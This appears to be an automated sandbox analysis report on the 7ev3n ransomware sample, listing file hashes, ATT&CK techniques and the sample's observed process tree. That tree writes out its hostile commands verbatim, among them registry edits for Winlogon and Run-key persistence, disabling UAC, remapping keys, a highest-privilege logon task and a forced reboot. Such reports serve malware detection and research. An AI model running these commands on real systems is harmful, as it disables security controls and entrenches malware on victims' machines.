2eaccf2ffad0c83282b940b5ed1e65f38acacc9e002b48e3bf4f852e1097232a

Analysis

max time kernel
72s
max time network
79s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
15-03-2024 21:38

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

ransomwares/7ev3n/7ev3n.exe
Size

315KB
MD5

9f8bc96c96d43ecb69f883388d228754
SHA1

61ed25a706afa2f6684bb4d64f69c5fb29d20953
SHA256

7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
SHA512

550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
SSDEEP

6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2836 cmd.exe
Executes dropped EXE 1 IoCs

Processes:

system.exe

pid process

2704 system.exe
Loads dropped DLL 2 IoCs

Processes:

7ev3n.exe

pid process

1456 7ev3n.exe
1456 7ev3n.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
2836	cmd.exe

pid	process
2704	system.exe

pid	process
1456	7ev3n.exe
1456	7ev3n.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

SCHTASKS.exe

pid process

1156 SCHTASKS.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 1964 shutdown.exe
Token: SeRemoteShutdownPrivilege 1964 shutdown.exe

pid	process
1156	SCHTASKS.exe

description	pid	process
Token: SeShutdownPrivilege	1964	shutdown.exe
Token: SeRemoteShutdownPrivilege	1964	shutdown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7ev3n.exesystem.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1456 wrote to memory of 2704	1456	7ev3n.exe	system.exe
PID 1456 wrote to memory of 2704	1456	7ev3n.exe	system.exe
PID 1456 wrote to memory of 2704	1456	7ev3n.exe	system.exe
PID 1456 wrote to memory of 2704	1456	7ev3n.exe	system.exe
PID 2704 wrote to memory of 2836	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2836	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2836	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2836	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1156	2704	system.exe	SCHTASKS.exe
PID 2704 wrote to memory of 1156	2704	system.exe	SCHTASKS.exe
PID 2704 wrote to memory of 1156	2704	system.exe	SCHTASKS.exe
PID 2704 wrote to memory of 1156	2704	system.exe	SCHTASKS.exe
PID 2704 wrote to memory of 2500	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2500	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2500	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2500	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2512	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2512	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2512	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2512	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2980	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2980	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2980	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2980	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2488	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2488	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2488	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 2488	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1636	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1636	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1636	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1636	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 768	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 768	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 768	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 768	2704	system.exe	cmd.exe
PID 2512 wrote to memory of 1100	2512	cmd.exe	reg.exe
PID 2512 wrote to memory of 1100	2512	cmd.exe	reg.exe
PID 2512 wrote to memory of 1100	2512	cmd.exe	reg.exe
PID 2512 wrote to memory of 1100	2512	cmd.exe	reg.exe
PID 2488 wrote to memory of 2672	2488	cmd.exe	reg.exe
PID 2488 wrote to memory of 2672	2488	cmd.exe	reg.exe
PID 2488 wrote to memory of 2672	2488	cmd.exe	reg.exe
PID 2488 wrote to memory of 2672	2488	cmd.exe	reg.exe
PID 2980 wrote to memory of 1060	2980	cmd.exe	reg.exe
PID 2980 wrote to memory of 1060	2980	cmd.exe	reg.exe
PID 2980 wrote to memory of 1060	2980	cmd.exe	reg.exe
PID 2980 wrote to memory of 1060	2980	cmd.exe	reg.exe
PID 768 wrote to memory of 2332	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2332	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2332	768	cmd.exe	reg.exe
PID 768 wrote to memory of 2332	768	cmd.exe	reg.exe
PID 2500 wrote to memory of 1152	2500	cmd.exe	reg.exe
PID 2500 wrote to memory of 1152	2500	cmd.exe	reg.exe
PID 2500 wrote to memory of 1152	2500	cmd.exe	reg.exe
PID 2500 wrote to memory of 1152	2500	cmd.exe	reg.exe
PID 1636 wrote to memory of 1148	1636	cmd.exe	reg.exe
PID 1636 wrote to memory of 1148	1636	cmd.exe	reg.exe
PID 1636 wrote to memory of 1148	1636	cmd.exe	reg.exe
PID 1636 wrote to memory of 1148	1636	cmd.exe	reg.exe
PID 2704 wrote to memory of 1580	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1580	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1580	2704	system.exe	cmd.exe
PID 2704 wrote to memory of 1580	2704	system.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\ransomwares\7ev3n\7ev3n.exe
"C:\Users\Admin\AppData\Local\Temp\ransomwares\7ev3n\7ev3n.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1456
- C:\Users\Admin\AppData\Local\system.exe
  "C:\Users\Admin\AppData\Local\system.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\del.bat
    3⤵
    - Deletes itself
    PID:2836
- - C:\Windows\SysWOW64\SCHTASKS.exe
    C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:1156
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Modifies WinLogon for persistence
      PID:1152
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Adds Run key to start application
      PID:1100
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
      4⤵
      PID:1060
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
      4⤵
      PID:2672
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
      4⤵
      PID:1148
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
      4⤵
      UAC bypass
      PID:2332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
    3⤵
    PID:1580
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
      4⤵
      PID:948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown -r -t 10 -f
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1964

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:2364

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\del.bat

Filesize
83B

MD5
c845363aae0b9f8f4c33759ac4610840

SHA1
fa0d93ee743416cf7f6bd39d888973c36e64cb44

SHA256
09968bc0c94979ff041838aea1119727122e3e33c7558c135e3f6ba8e4de62eb

SHA512
550fe7d835ab46421b4b20e1425330ce43c7cacc72f7cff657a956cbd2aacc48c3e40d8fa84262e6b5af5205853662cc69202da277ccb807b4acf87196383d14

Download Submit
\Users\Admin\AppData\Local\system.exe

Filesize
315KB

MD5
cd9080bb60574a2c0f6146423afa8024

SHA1
bdf88c90416f66518af1480c483088bc8a26b5e3

SHA256
63689a07149b730a68f3b1d63781cd585c953cbf1efafbe36f7a0be68202cd52

SHA512
e3e424f55cb4868ff901dd0040d8a928cf1da233b1449682edc3990eb7b7dd4d157d797a24ac9e5ef1b7c87c6ca7eacbd186d819b3b3b99096d7c7bab214846b

Download Submit
memory/2268-100-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/2364-99-0x0000000002B80000-0x0000000002B81000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads